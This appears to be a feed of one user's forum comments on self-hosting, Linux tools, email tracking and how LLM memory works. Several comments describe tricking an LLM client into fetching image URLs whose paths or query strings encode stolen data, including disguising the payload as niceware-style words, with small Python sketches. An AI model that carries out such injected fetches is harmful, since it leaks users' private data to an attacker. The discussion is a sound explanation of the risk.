Oftentimes this language is used to drum up funding for exactly these types of things.
If you’re still posting on Reddit or Twitter, and it’s not for a niche community, please don’t come here.
Or, https://www.firefly-iii.org/, a full self-hosted system similar to Mint.
Oooo healthy online discourse. Where’s my popcorn…
This post isn’t about email open rates; it’s about data exfiltration. But for email specifically, show me major providers that prefetch by default.
If by prefetch you mean the server grabs the images ahead of time vs the client, this does not happen, at least on any major modern platform that I know of. They will cache once a client has opened, but unique URLs per recipient are how they track the open rates.
Server or client, every supposed prefetch would be unique. If I trick an LLM client into grabbing:
site.com/random-words-of-data/image.gif
Then:
site.com/more-random-data/image.gif
Those are two separate images to the cache engine. As the data refreshes, the URL changes, forcing a new grab each time.
For email, marketers do this by using a unique image URL for every recipient.
But the path changes with every new data element. It’s never the same, so every “prefetch” is a whole new image in the system’s eyes.
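A minimal sketch of why caching can’t help here, assuming the payload is packed into the URL path (the domain and path shape follow the hypothetical example above):

```python
import base64

def exfil_url(data: bytes) -> str:
    # Encode the payload into the URL path. Every distinct payload
    # yields a distinct URL, so a cache keyed on the URL never gets
    # a hit for fresh data. (site.com is a placeholder domain.)
    token = base64.urlsafe_b64encode(data).decode().rstrip("=")
    return f"https://site.com/{token}/image.gif"

url_a = exfil_url(b"first secret")
url_b = exfil_url(b"second secret")
# Different payloads produce different URLs, i.e. two separate
# "images" as far as any cache or prefetcher is concerned.
```

Same trick marketers use with per-recipient URLs, just with the data changing instead of the recipient.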
This wouldn’t help, would it? How would you prefetch and cache:
site.com/base64u-to-niceware-word-array/image.gif
? It would look like a normal image URL in any article, but actually represent data.
Note: “niceware” is a way to convert binary or text data into a set of words like “cow-heart-running-something-etc”.
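To make the idea concrete, here’s a toy sketch of that kind of word encoding. The real niceware library works off a much larger fixed wordlist; this eight-word list and the 3-bit chunking are purely illustrative:

```python
# Hypothetical tiny wordlist; the real niceware list is far larger.
WORDS = ["cow", "heart", "running", "apple", "stone", "river", "cloud", "ember"]

def encode(data: bytes) -> str:
    # 8 words means 3 bits per word: turn the payload into a bit
    # string, pad to a multiple of 3, and index each chunk into WORDS.
    bits = "".join(f"{b:08b}" for b in data)
    bits += "0" * (-len(bits) % 3)
    return "-".join(WORDS[int(bits[i:i + 3], 2)] for i in range(0, len(bits), 3))

path = encode(b"hi")                        # reads like ordinary words
url = f"https://site.com/{path}/image.gif"  # but the path carries the payload
```

The resulting URL looks like any word-slug image link, which is the whole point.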
Sort of, but not really.
In basic terms, if an LLM’s training data has:
Bob is 21 years old.
Bob is 32 years old.
Then when it tries to predict the next word after “Bob is”, it would pick 21 or 32, assuming the weights were somehow perfectly equal between the two (weight being based on how often each occurred in the training data around other words).
If the user has memories turned on, it’s sort of like providing additional training data. So if in previous prompts you said:
I am Bob.
I am 43 years old.
The system will parse that and use it with a higher weight, sort of like custom training the model. This is not exactly how it works; training is much more in-depth, and it’s really more of a layer on top of the training, but hopefully that gives you an idea.
The catch is it’s still not reliable, as the other words in your prompt may still lead the LLM to predict a word from its original training data. Tuning the weights is not a one-size-fits-all endeavor. What works for:
How old am I?
May not work for:
What age is Bob?
For instance.
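A rough sketch of the “layer on top” idea: stored memory lines get prepended to the prompt as extra context, nudging prediction toward them without retraining. The function name and formatting here are hypothetical; real systems do this with far more structure than plain concatenation:

```python
# Hypothetical memory store built from earlier prompts.
memories = ["I am Bob.", "I am 43 years old."]

def build_prompt(user_prompt: str) -> str:
    # Prepend each remembered fact as context ahead of the question.
    context = "\n".join(f"Memory: {m}" for m in memories)
    return f"{context}\n\nUser: {user_prompt}"

prompt = build_prompt("How old am I?")
# The model now sees "I am 43 years old." right next to the question,
# which raises the odds it predicts 43 over ages from training data,
# but doesn't guarantee it.
```

Which is also why a rephrased question can still slip past the memory and land on training-data answers.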
Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That’s also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
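For what it’s worth, that classic pattern is just data packed into an image URL’s query string. A minimal sketch (domain and parameter name taken from the example above):

```python
from urllib.parse import urlencode

def pixel_url(data: str) -> str:
    # Pack the payload into the query string of a "tracking pixel".
    # Fetching the image hands the data to whoever runs site.com.
    return "https://site.com/badimage.gif?" + urlencode({"data": data})

url = pixel_url("abcd")
# -> https://site.com/badimage.gif?data=abcd
```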
When you boot up for a meeting and have to wait 10 minutes for updates to finish. Too much like Windows.
Two things to change if you switch from Ubuntu to Debian:
If only they’d change the dumb way date time entry works for the calendar it would be near perfect.
Using Evolution for desktop but about to give Thunderbird another shot I think.
Usually on my desktop connected to vscode-server, but when I’m remote, yes.
I use a Samsung Tab 9. Then supplement with a server running VSCode-server and other things. I would prefer Linux, and sometimes use Termux:X11, but it was the best I could come up with.
Really? Have you set up services with docker before? I found it super easy compared to other systems. Curious what specifically threw you as I barely did anything except spin it up.
Don’t even need tabs with screen.
Big fan, but if you haven’t tried Obtainium as a client, give it a go. Can manage installs from F-Droid, GitHub releases, and more.